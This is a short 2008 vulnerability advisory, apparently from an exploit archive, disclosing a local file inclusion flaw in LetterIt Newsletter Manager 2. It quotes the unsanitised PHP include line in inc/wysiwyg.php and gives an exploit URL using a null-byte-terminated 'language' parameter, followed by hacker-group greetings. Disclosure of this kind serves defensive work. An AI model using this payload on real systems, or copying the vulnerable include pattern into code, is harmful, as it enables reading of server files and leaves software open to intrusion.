LetterIt 2 (language) Local File Inclusion Vulnerability

2008-07-31 00:00:00

====================================================================


[o] LetterIt 2 Local File Inclusion Vulnerability

Software : LetterIt Newsletter Manager version 2
Vendor : http://www.letterit.de/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com


====================================================================


[o] Vulnerable file

inc/wysiwyg.php

include("../language/".$_GET['language'].".php");



[o] Exploit

http://localhost/[path]/inc/wysiwyg.php?language=[LFI]%00


====================================================================


[o] Greetz

supported by irc.nob0dy.net
MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ martfella
skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke


====================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.